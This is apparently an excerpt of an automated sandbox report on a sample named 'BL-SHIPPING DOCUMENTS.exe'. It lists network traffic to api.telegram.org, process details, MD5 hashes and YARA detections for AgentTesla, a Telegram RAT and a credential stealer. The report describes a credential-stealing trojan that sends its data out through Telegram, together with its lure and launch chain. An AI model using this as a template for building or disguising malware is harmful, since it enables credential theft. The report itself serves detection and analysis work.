                            Nov 29, 2022 20:01:09.951687098 CET49705443192.168.2.5149.154.167.220
                            Nov 29, 2022 20:01:09.954327106 CET49705443192.168.2.5149.154.167.220
                            Nov 29, 2022 20:01:09.954346895 CET44349705149.154.167.220192.168.2.5
                            Nov 29, 2022 20:01:09.954652071 CET44349705149.154.167.220192.168.2.5
                            Nov 29, 2022 20:01:10.128216028 CET49705443192.168.2.5149.154.167.220
                            Nov 29, 2022 20:01:10.269850016 CET49705443192.168.2.5149.154.167.220
                            Nov 29, 2022 20:01:10.269910097 CET44349705149.154.167.220192.168.2.5
                            Nov 29, 2022 20:01:10.299458027 CET44349705149.154.167.220192.168.2.5
                            Nov 29, 2022 20:01:10.306413889 CET49705443192.168.2.5149.154.167.220
                            Nov 29, 2022 20:01:10.306437016 CET44349705149.154.167.220192.168.2.5
                            Nov 29, 2022 20:01:10.392920017 CET44349705149.154.167.220192.168.2.5
                            Nov 29, 2022 20:01:10.393022060 CET44349705149.154.167.220192.168.2.5
                            Nov 29, 2022 20:01:10.393160105 CET49705443192.168.2.5149.154.167.220
                            Nov 29, 2022 20:01:10.394990921 CET49705443192.168.2.5149.154.167.220
                            TimestampSource PortDest PortSource IPDest IP
                            Nov 29, 2022 20:01:09.783638000 CET4972453192.168.2.58.8.8.8
                            Nov 29, 2022 20:01:09.800700903 CET53497248.8.8.8192.168.2.5
                            TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                            Nov 29, 2022 20:01:09.783638000 CET192.168.2.58.8.8.80xe01Standard query (0)api.telegram.orgA (IP address)IN (0x0001)false
                            TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                            Nov 29, 2022 20:01:09.800700903 CET8.8.8.8192.168.2.50xe01No error (0)api.telegram.org149.154.167.220A (IP address)IN (0x0001)false
                            • api.telegram.org

                            Click to jump to process

                            Target ID:0
                            Start time:20:00:00
                            Start date:29/11/2022
                            Path:C:\Users\user\Desktop\BL-SHIPPING DOCUMENTS.exe
                            Wow64 process (32bit):false
                            Commandline:C:\Users\user\Desktop\BL-SHIPPING DOCUMENTS.exe
                            Imagebase:0x249f7060000
                            File size:489472 bytes
                            MD5 hash:69FE54A9CAFEE09F25E0D3F7A51488C7
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:.Net C# or VB.NET
                            Reputation:low

                            Target ID:1
                            Start time:20:00:48
                            Start date:29/11/2022
                            Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe
                            Wow64 process (32bit):true
                            Commandline:C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe
                            Imagebase:0xa90000
                            File size:107624 bytes
                            MD5 hash:F866FC1C2E928779C7119353C3091F0C
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:.Net C# or VB.NET
                            Yara matches:
                            • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000001.00000000.397838302.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                            • Rule: JoeSecurity_AgentTesla_2, Description: Yara detected AgentTesla, Source: 00000001.00000000.397838302.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                            • Rule: Windows_Trojan_AgentTesla_d3ac2b2f, Description: unknown, Source: 00000001.00000000.397838302.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: unknown
                            • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000001.00000002.819488007.0000000003151000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                            • Rule: JoeSecurity_TelegramRAT, Description: Yara detected Telegram RAT, Source: 00000001.00000002.819488007.0000000003151000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                            • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000001.00000002.819488007.0000000003151000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                            Reputation:moderate

                            No disassembly